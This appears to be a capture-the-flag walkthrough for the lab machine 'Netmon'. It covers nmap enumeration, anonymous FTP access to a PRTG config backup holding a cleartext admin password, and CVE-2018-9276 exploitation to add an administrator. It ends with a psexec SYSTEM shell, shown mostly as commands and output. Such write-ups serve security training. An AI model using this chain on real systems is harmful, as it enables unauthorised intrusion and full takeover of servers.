Netmon is a more challenging beginner box that tests the user’s ability to enumerate NMAP, locate sensitive files with FTP, and utilize public exploits to attack a target.
Step 1: Enumerate with NMAP
The first step in attacking this box is to use NMAP to enumerate what ports are open and which services are running.
➜ netmon nmap -A -v 10.129.130.58 -Pn -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-21 22:13 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:13
Completed NSE at 22:13, 0.00s elapsed
Initiating NSE at 22:13
Completed NSE at 22:13, 0.00s elapsed
Initiating NSE at 22:13
Completed NSE at 22:13, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 22:13
Completed Parallel DNS resolution of 1 host. at 22:13, 0.00s elapsed
Initiating Connect Scan at 22:13
Scanning 10.129.130.58 [65535 ports]
Discovered open port 139/tcp on 10.129.130.58
Discovered open port 445/tcp on 10.129.130.58
Discovered open port 135/tcp on 10.129.130.58
Discovered open port 21/tcp on 10.129.130.58
Discovered open port 80/tcp on 10.129.130.58
Discovered open port 47001/tcp on 10.129.130.58
Discovered open port 49669/tcp on 10.129.130.58
Discovered open port 49668/tcp on 10.129.130.58
Discovered open port 5985/tcp on 10.129.130.58
Discovered open port 49664/tcp on 10.129.130.58
Discovered open port 49665/tcp on 10.129.130.58
Discovered open port 49667/tcp on 10.129.130.58
Discovered open port 49666/tcp on 10.129.130.58
Completed Connect Scan at 22:13, 39.55s elapsed (65535 total ports)
Initiating Service scan at 22:13
Scanning 13 services on 10.129.130.58
Service scan Timing: About 61.54% done; ETC: 22:15 (0:00:34 remaining)
Completed Service scan at 22:14, 54.03s elapsed (13 services on 1 host)
NSE: Script scanning 10.129.130.58.
Initiating NSE at 22:14
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 22:14, 7.16s elapsed
Initiating NSE at 22:14
Completed NSE at 22:14, 0.17s elapsed
Initiating NSE at 22:14
Completed NSE at 22:14, 0.00s elapsed
Nmap scan report for 10.129.130.58
Host is up (0.026s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_02-25-19 10:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-01-22T03:14:42
|_ start_date: 2023-01-22T03:08:47
NSE: Script Post-scanning.
Initiating NSE at 22:14
Completed NSE at 22:14, 0.00s elapsed
Initiating NSE at 22:14
Completed NSE at 22:14, 0.00s elapsed
Initiating NSE at 22:14
Completed NSE at 22:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.61 seconds
We can see that ports 21 and 80 are open, so we will start our investigation there.
Step 2: Exploring FTP
The NMAP scan results indicate that FTP is publicly accessible with anonymous access, meaning that anyone can authenticate to this FTP server with credentials anonymous:anonymous
. Let’s login and take a look around to see if we can find anything of interest.
➜ netmon ftp 10.129.130.58
Connected to 10.129.130.58.
220 Microsoft FTP Service
Name (10.129.130.58:exo): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49829|)
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
02-25-19 10:49PM <DIR> Windows
226 Transfer complete.
ftp>
We can see that the Users directory may be available, and we may even be able to nab the user flag for this box if we are lucky. Let’s take a look inside this folder to see what we find.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49850|)
125 Data connection already open; Transfer starting.
02-25-19 10:44PM <DIR> Administrator
02-02-19 11:35PM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49852|)
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
01-21-23 10:09PM 34 user.txt
07-16-16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49858|)
150 Opening ASCII mode data connection.
100% |*************************************************************************************************************************************************************************************************| 34 1.84 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (1.80 KiB/s)
ftp>
We have found the user flag very early in our search. Let’s take a look at what port 80 has to offer us before we go any further.
Step 3: Gaining Access to the Admin Panel
Upon navigating to http://10.129.130.58
we are greeted by a login screen. We havent’t found any credentials yet, so we can try a few guesses at what the username and password may be, but we will more than likely need to dive deeper into the directories available via FTP to find potential login credentials.
➜ netmon ftp 10.129.130.58
Connected to 10.129.130.58.
220 Microsoft FTP Service
Name (10.129.130.58:exo): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49903|)
150 Opening ASCII mode data connection.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
02-25-19 10:49PM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49908|)
150 Opening ASCII mode data connection.
02-25-19 10:44PM <DIR> Administrator
02-02-19 11:35PM <DIR> Public
226 Transfer complete.
ftp> ls -al
229 Entering Extended Passive Mode (|||49910|)
150 Opening ASCII mode data connection.
02-25-19 10:44PM <DIR> Administrator
07-16-16 08:28AM <DIR> All Users
02-03-19 07:05AM <DIR> Default
07-16-16 08:28AM <DIR> Default User
07-16-16 08:16AM 174 desktop.ini
02-02-19 11:35PM <DIR> Public
226 Transfer complete.
ftp> cd All\ Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49914|)
150 Opening ASCII mode data connection.
12-15-21 09:40AM <DIR> Corefig
02-02-19 11:15PM <DIR> Licenses
11-20-16 09:36PM <DIR> Microsoft
02-02-19 11:18PM <DIR> Paessler
02-03-19 07:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 08:18AM <DIR> SoftwareDistribution
02-02-19 11:15PM <DIR> TEMP
11-20-16 09:19PM <DIR> USOPrivate
11-20-16 09:19PM <DIR> USOShared
02-25-19 09:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49915|)
150 Opening ASCII mode data connection.
01-21-23 10:19PM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd PRTG\ Network\ Monitor
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49916|)
150 Opening ASCII mode data connection.
01-21-23 10:19PM <DIR> Configuration Auto-Backups
01-21-23 10:19PM <DIR> Log Database
02-02-19 11:18PM <DIR> Logs (Debug)
02-02-19 11:18PM <DIR> Logs (Sensors)
02-02-19 11:18PM <DIR> Logs (System)
01-21-23 10:19PM <DIR> Logs (Web Server)
01-21-23 10:19PM <DIR> Monitoring Database
02-25-19 09:54PM 1189697 PRTG Configuration.dat
02-25-19 09:54PM 1189697 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
01-21-23 10:19PM 1641143 PRTG Graph Data Cache.dat
02-25-19 10:00PM <DIR> Report PDFs
02-02-19 11:18PM <DIR> System Information Database
02-02-19 11:40PM <DIR> Ticket Database
02-02-19 11:18PM <DIR> ToDo Database
226 Transfer complete.
After listing all the users on this server we can see that there appears to be a service account (Paessler) used to run the website running at http://10.129.130.58
. We dive deeper into the folder structure until we reach what appears to be old backups of configuration files. We search through each of the files, looking for credentials, but PRTGConfiguration.old.bak is the only file that yields results. We can download the file and open it to search for any cleartext credentials.
ftp> get PRTG\ Configuration.old.bak
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
229 Entering Extended Passive Mode (|||50005|)
150 Opening ASCII mode data connection.
100% |*************************************************************************************************************************************************************************************************| 1126 KiB 2.16 MiB/s 00:00 ETA
226 Transfer complete.
1153755 bytes received in 00:00 (2.16 MiB/s)
ftp>
We search through the file until we find the following lines:
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
We tried to login to the admin interface at http://10.129.130.58
with the credentials we found, but we are unable to authenticate. Seeing that this box was released in 2019, we can try updating the 2018 in the password to 2019. We are able to login after updating the password.
Step 4: Exploiting the Target
The final step is to exploit the target. We can see on the admin panel web page, as well as the login page, that the software powering this site is PRTG Network Monitor 18.1.37.13946. Let’s try using Searchsploit to see if there is a public exploit available for the listed software and version.
➜ netmon cd /opt
➜ /opt ls
brave.com exploitdb exploitdb-papers impacket metasploit-framework
➜ /opt cd exploitdb
➜ exploitdb ls
exploits files_exploits.csv files_shellcodes.csv ghdb.xml LICENSE.md README.md searchsploit shellcodes
➜ exploitdb ./searchsploit PRTG
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution | windows/webapps/46527.sh
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS | windows/webapps/49156.txt
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service) | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting | java/webapps/34108.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
We can see that there is an exploit for PRTG Network Monitor 18.2.38 that requires us to already be authenticated, which we are. We are on an older version of this software, but we can try this exploit just to see if it works.
Upon copying the exploit to our working folder and reading through the code, we can see that it requires a multipart cookie. We tried grabbing the cookie from the developer tools in our web browser, but it only listed a single part of the multipart cookie. However, we can try using burp suite to intercept the requests and gather the required information. Upon grabbing the full cookie string from burp suite, we can use the following command to create a new account on the victim machine and give it elevated privileges.
➜ netmon ./46527.sh -u http://10.129.130.58 -c "_ga=GA1.4.684082098.1674359392; _gid=GA1.4.1864107615.1674359392; OCTOPUS1813713946=e0FERjk3Q0U4LUEzQUQtNERFNC1BNjZELTZCQzcxN0NGNTRBQX0%3D; _gat=1"
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019 [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg [*]
[*] Version: 18.2.38 [*]
[*] CVE: CVE-2018-9276 [*]
[*] Reference: https://www.codewatch.org/blog/?p=453 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+]#########################################################################[+]
[*] file created
[*] sending notification wait....
[*] adding a new user 'pentest' with password 'P3nT3st'
[*] sending notification wait....
[*] adding a user pentest to the administrators group
[*] sending notification wait....
[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!
We should now be able to use impacket to try remoting into the victim machine with the newly created account and credentials.
➜ netmon cd /opt/impacket
➜ impacket ls
ChangeLog.md Dockerfile examples impacket LICENSE MANIFEST.in README.md requirements-test.txt requirements.txt SECURITY.md setup.py TESTING.md tests tox.ini
➜ impacket cd examples
➜ examples ls
addcomputer.py exchanger.py GetNPUsers.py goldenPac.py machine_role.py netview.py ping.py registry-read.py samrdump.py smbpasswd.py split.py wmipersist.py
atexec.py findDelegation.py getPac.py karmaSMB.py mimikatz.py nmapAnswerMachine.py psexec.py reg.py secretsdump.py smbrelayx.py ticketConverter.py wmiquery.py
dcomexec.py GetADUsers.py getST.py keylistattack.py mqtt_check.py ntfs-read.py raiseChild.py rpcdump.py services.py smbserver.py ticketer.py
dpapi.py getArch.py getTGT.py kintercept.py mssqlclient.py ntlmrelayx.py rbcd.py rpcmap.py smbclient.py sniffer.py tstool.py
esentutl.py Get-GPPPassword.py GetUserSPNs.py lookupsid.py mssqlinstance.py ping6.py rdp_check.py sambaPipe.py smbexec.py sniff.py wmiexec.py
➜ examples python3 psexec.py 'pentest'@10.129.130.58
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.129.130.58.....
[*] Found writable share ADMIN$
[*] Uploading file ulrretvp.exe
[*] Opening SVCManager on 10.129.130.58.....
[*] Creating service HNCL on 10.129.130.58.....
[*] Starting service HNCL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
We have gained access to the victim server! Let’s see what level of access we have.
C:\Windows\system32> whoami
nt authority\system
We have elevated privileges! The only remaining step is to gather the root flag from the administrator’s desktop and submit.